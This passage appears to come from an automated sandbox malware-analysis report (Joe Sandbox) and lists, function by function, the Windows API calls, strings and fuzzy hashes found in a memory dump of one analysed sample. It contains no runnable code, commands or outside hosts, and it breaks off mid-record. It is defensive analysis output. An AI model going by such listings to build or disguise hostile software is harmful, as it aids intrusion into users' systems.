                                                • ReleaseDC.USER32(?), ref: 0056D8A3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 587933b3dbc702fa7ea6e77ed2ba42330fd5dfb5924db8b132cafcaaa00c6018
                                                • Instruction ID: 967b2f4171f1099f455d179a3d3f2215e27ba0317e127c4cc6dd779dd11b1383
                                                • Opcode Fuzzy Hash: 587933b3dbc702fa7ea6e77ed2ba42330fd5dfb5924db8b132cafcaaa00c6018
                                                • Instruction Fuzzy Hash: 78E012B4800204EFCB41AFA4D80C66EBFB1BB19310B108408E80AE7360CB38990AAF50
                                                APIs
                                                  • Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625
                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00584ED4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Connection_wcslen
                                                • String ID: *$LPT
                                                • API String ID: 1725874428-3443410124
                                                • Opcode ID: 50cdfcd0c80f2875b9d9fafd9d0b68a234cc6281d139b57edf0632c7582f4257
                                                • Instruction ID: ec4d1fe4e7100715e07138861d22498cf32366a0cc2e57413c7249f885553b84
                                                • Opcode Fuzzy Hash: 50cdfcd0c80f2875b9d9fafd9d0b68a234cc6281d139b57edf0632c7582f4257
                                                • Instruction Fuzzy Hash: BB914A75A002059FDB14EF58C484AAABFB5BF48304F198099ED0AAB362D731ED85CF91
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 0053E30D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__start
                                                • String ID: pow
                                                • API String ID: 3213639722-2276729525
                                                • Opcode ID: a521351e38fd914cd9748babc6443914a3f291837160b753a9f2b414ba0853ca
                                                • Instruction ID: 3c105a0531dd9e4f1d239972786d0b5c7827b106ddec0575143a0e72a3a4b853
                                                • Opcode Fuzzy Hash: a521351e38fd914cd9748babc6443914a3f291837160b753a9f2b414ba0853ca
                                                • Instruction Fuzzy Hash: 5E515971E1C20A96CB157724C9473FA3FE8FB54744F208E98E095832E9EB309C95AA46
                                                APIs
                                                • CharUpperBuffW.USER32(0056569E,00000000,?,005ACC08,?,00000000,00000000), ref: 005978DD
                                                  • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                • CharUpperBuffW.USER32(0056569E,00000000,?,005ACC08,00000000,?,00000000,00000000), ref: 0059783B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper$_wcslen
                                                • String ID: <s]
                                                • API String ID: 3544283678-3287859866
                                                • Opcode ID: c4a76884b88d05f07e957f978f1b1fa8f9ef946f2e6bf42aa1d9ed41a23ea3ce
                                                • Instruction ID: f78ab4f2a3c13ab3eb41a6b18f90cb29e4d93f20758be01d84cf36e5052db489
                                                • Opcode Fuzzy Hash: c4a76884b88d05f07e957f978f1b1fa8f9ef946f2e6bf42aa1d9ed41a23ea3ce
                                                • Instruction Fuzzy Hash: C9616B7292411AAADF04EBA4CC95DFDBB78FF58300F540926E542A3191EF306A85DBA0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                • Opcode ID: d49aea0f79622708839d8c7b551583b72b66cad7436c0c37abe0428c25b3bd83
                                                • Instruction ID: 66adfff15f52614cec2f1f134505b049b2068563e8ecacdaee075e01aa8943b8
                                                • Opcode Fuzzy Hash: d49aea0f79622708839d8c7b551583b72b66cad7436c0c37abe0428c25b3bd83
                                                • Instruction Fuzzy Hash: A1513339502296DFDF15DF28D086AFA7FA8FF66310F644055E8929B2C0D6349D82CBA0
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 0052F2A2
                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0052F2BB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: GlobalMemorySleepStatus
                                                • String ID: @
                                                • API String ID: 2783356886-2766056989
                                                • Opcode ID: c74dde67e1f6d21e205f5e19fd96fb59d69fa193dacbb454621c85b518957ae6
                                                • Instruction ID: c7a2995c9ab9ec5f6a5ad5f1cdfd9c427da7dc9de0f0fd6f0e4bc561255378ce
                                                • Opcode Fuzzy Hash: c74dde67e1f6d21e205f5e19fd96fb59d69fa193dacbb454621c85b518957ae6
                                                • Instruction Fuzzy Hash: 95514971408B499BE320AF14DC8ABABBBF8FFD9300F81485DF1D941195EB318569CB66
                                                APIs
                                                • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 005957E0
                                                • _wcslen.LIBCMT ref: 005957EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper_wcslen
                                                • String ID: CALLARGARRAY
                                                • API String ID: 157775604-1150593374
                                                • Opcode ID: 92714ac8121d4e3579a21eab9b2995cc6c0dae05a0094faa19f3c06a8767730d
                                                • Instruction ID: 1c137534ec4c76d0c473b9da2367f8f55f118cdcbbcc352f0b521fcfa437f5d1
                                                • Opcode Fuzzy Hash: 92714ac8121d4e3579a21eab9b2995cc6c0dae05a0094faa19f3c06a8767730d
                                                • Instruction Fuzzy Hash: 42418071A0010A9FCF15DFA9D8899EEBFF5FF99320F244069E505A7291E7309D91CB90
                                                APIs
                                                • _wcslen.LIBCMT ref: 0058D130
                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0058D13A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CrackInternet_wcslen
                                                • String ID: |
                                                • API String ID: 596671847-2343686810
                                                • Opcode ID: 8dc1b1c69ce2af2d77bf59b796b38f88908ad9efa361b3b3ab525f61b27950a0
                                                • Instruction ID: 20de1884158e0cb95b0cdf2d8ee3d4ff1b41bc96ce37ac12595cdfae6ab8a7f9
                                                • Opcode Fuzzy Hash: 8dc1b1c69ce2af2d77bf59b796b38f88908ad9efa361b3b3ab525f61b27950a0
                                                • Instruction Fuzzy Hash: 91311A71D0020AABDF15EFA4CC89AEFBFB9FF44300F000119F815A6165DB31AA56DB60
                                                APIs
                                                • DestroyWindow.USER32(?,?,?,?), ref: 005A3621
                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 005A365C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$DestroyMove
                                                • String ID: static
                                                • API String ID: 2139405536-2160076837
                                                • Opcode ID: 99cf8721bbbf0af5fb9d03e06293ab2ddf1a5e7f8a35beab55d70fb5d3a8ec86
                                                • Instruction ID: ec25a2110fa329503b0883681e4de8e28bc733ad666cfcda874b9030258fb835
                                                • Opcode Fuzzy Hash: 99cf8721bbbf0af5fb9d03e06293ab2ddf1a5e7f8a35beab55d70fb5d3a8ec86
                                                • Instruction Fuzzy Hash: 2231AD71500204AEEB109F68DC84EFF7BA9FF89724F008619F8A597280DA31AD81D760
                                                APIs
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 005A461F
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005A4634
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                • Opcode ID: b4c3178dca700e86665d0cc00e29ceb6bbc411a83cd23056dbacc146c5d51745
                                                • Instruction ID: cf6a83b4df17a8db4cdfa2242298cf86384d68b0ab00f160ebbea7432901c601
                                                • Opcode Fuzzy Hash: b4c3178dca700e86665d0cc00e29ceb6bbc411a83cd23056dbacc146c5d51745
                                                • Instruction Fuzzy Hash: 11310774A0120A9FDB14CFA9C990BEE7BB5FF8A300F14446AE905AB351D7B0A941DF90
                                                APIs
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 005A327C
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005A3287
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: Combobox
                                                • API String ID: 3850602802-2096851135
                                                • Opcode ID: 15a5f86fe614abad92210b838aafd138aa582b47e32194301fab63345ff049fc
                                                • Instruction ID: 2066e20eb525f80fa94064adbde64d5f5ed8f3dafd71121173266e5b07c47926
                                                • Opcode Fuzzy Hash: 15a5f86fe614abad92210b838aafd138aa582b47e32194301fab63345ff049fc
                                                • Instruction Fuzzy Hash: CF11D0752002086FEF219E94DC84FBF3F6AFF9A3A8F100125F9189B290D6319D5197A0
                                                APIs
                                                  • Part of subcall function 0051600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0051604C
                                                  • Part of subcall function 0051600E: GetStockObject.GDI32(00000011), ref: 00516060
                                                  • Part of subcall function 0051600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051606A
                                                • GetWindowRect.USER32(00000000,?), ref: 005A377A
                                                • GetSysColor.USER32(00000012), ref: 005A3794
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                • String ID: static
                                                • API String ID: 1983116058-2160076837
                                                • Opcode ID: 43475b6a7eb57b70b17046f5870abbcdfba026bbd09eba550e85b5845f200ab2
                                                • Instruction ID: 134114b73b3ec6008c4fdbef1b1a556f0835499b4b2661c04ee85addd2195076
                                                • Opcode Fuzzy Hash: 43475b6a7eb57b70b17046f5870abbcdfba026bbd09eba550e85b5845f200ab2
                                                • Instruction Fuzzy Hash: 7B1129B261020AAFDB00DFA8CC45EFE7BF8FB09354F004914F955E2250E735E9559B60
                                                APIs
                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0058CD7D
                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0058CDA6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Internet$OpenOption
                                                • String ID: <local>
                                                • API String ID: 942729171-4266983199
                                                • Opcode ID: cf2ae006d965c32106c1efc617839c36901c7fc09f0c90bbf92d7c5d563d3e4c
                                                • Instruction ID: fb1ba8f2978b495ded9addbb0a05f2c7d65b8cdca9bcddf79a4e286ef4275730
                                                • Opcode Fuzzy Hash: cf2ae006d965c32106c1efc617839c36901c7fc09f0c90bbf92d7c5d563d3e4c
                                                • Instruction Fuzzy Hash: A811C671206671BAD7347B668C45EE7BEACFF127A4F00462AB909A3180D7709845D7F0
                                                APIs
                                                • GetWindowTextLengthW.USER32(00000000), ref: 005A34AB
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005A34BA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: LengthMessageSendTextWindow
                                                • String ID: edit
                                                • API String ID: 2978978980-2167791130
                                                • Opcode ID: 32e96a35f1f56fee2827c0d10b76a75478074af331fc01c2f331f47d7758c70d
                                                • Instruction ID: 9d9a95a7db6a4abb988c022aa4904b02f30f53cebd6b163eaa9ec8997abdc26b
                                                • Opcode Fuzzy Hash: 32e96a35f1f56fee2827c0d10b76a75478074af331fc01c2f331f47d7758c70d
                                                • Instruction Fuzzy Hash: 52116D71500208AFEF118E64DC48AAF3F6AFB5A378F504724FA61971D0C771DC959B60
                                                APIs
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                • CharUpperBuffW.USER32(?,?,?), ref: 00576CB6
                                                • _wcslen.LIBCMT ref: 00576CC2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen$BuffCharUpper
                                                • String ID: STOP
                                                • API String ID: 1256254125-2411985666
                                                • Opcode ID: 48ef831d5bccab33e5c52a4888385ecd87bd05b936b692faa66cfa2d71c84213
                                                • Instruction ID: 3d49b2ca4b2bfd66e2ba967bda0ef6c6f227092774e8f1505fe71e82b8efa2d0
                                                • Opcode Fuzzy Hash: 48ef831d5bccab33e5c52a4888385ecd87bd05b936b692faa66cfa2d71c84213
                                                • Instruction Fuzzy Hash: C30104326109278ACB219FBDEC849FF3FA8FAA1710B504924E85697190EB31DD40D650
                                                APIs
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                  • Part of subcall function 00573CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00573CCA
                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 00571C46
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 624084870-1403004172
                                                • Opcode ID: efe651c9493d0f528e7c4a7d4f627ef353659f84160671756b816cbee4653579
                                                • Instruction ID: 1ed53540a4fb225e058c0ca27bc0fbcb6ae22f75b40d3c3dadd142d70f95ccc8
                                                • Opcode Fuzzy Hash: efe651c9493d0f528e7c4a7d4f627ef353659f84160671756b816cbee4653579
                                                • Instruction Fuzzy Hash: 1401FC7164010566DB15E7D4D95A9FF7FACBF51340F200016A80A672C1EA209E08A6B5
                                                APIs
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                  • Part of subcall function 00573CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00573CCA
                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 00571CC8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 624084870-1403004172
                                                • Opcode ID: 5236eee65be101673e819480d9aa51cae9b5e414ae6b3e37adac3c6d15ee0cc8
                                                • Instruction ID: 8e6eb290ae1d6c6b4aab50148884e3fb06073902ca1ef74948d86ff6d13b0da8
                                                • Opcode Fuzzy Hash: 5236eee65be101673e819480d9aa51cae9b5e414ae6b3e37adac3c6d15ee0cc8
                                                • Instruction Fuzzy Hash: CC012B7164051567DB15EBD8DA16AFE7FACBF51380F104016B84677281EA208F08E2B5
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 0052A529
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer_wcslen
                                                • String ID: ,%^$3yV
                                                • API String ID: 2551934079-817577063
                                                • Opcode ID: 3d492e377663612434aeece31e17e115a4dd26e799b10a603d7cd03b3f516d98
                                                • Instruction ID: 7c970d733234b0c6971b9745d9ffd2b6b1bc791d4476596c126bdaaeb97af815
                                                • Opcode Fuzzy Hash: 3d492e377663612434aeece31e17e115a4dd26e799b10a603d7cd03b3f516d98
                                                • Instruction Fuzzy Hash: 6401F73270066197CE08F768E86FA9E7F68BF86710F401425F9025B1C2DE509D458AD7
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005E3018,005E305C), ref: 005A81BF
                                                • CloseHandle.KERNEL32 ref: 005A81D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
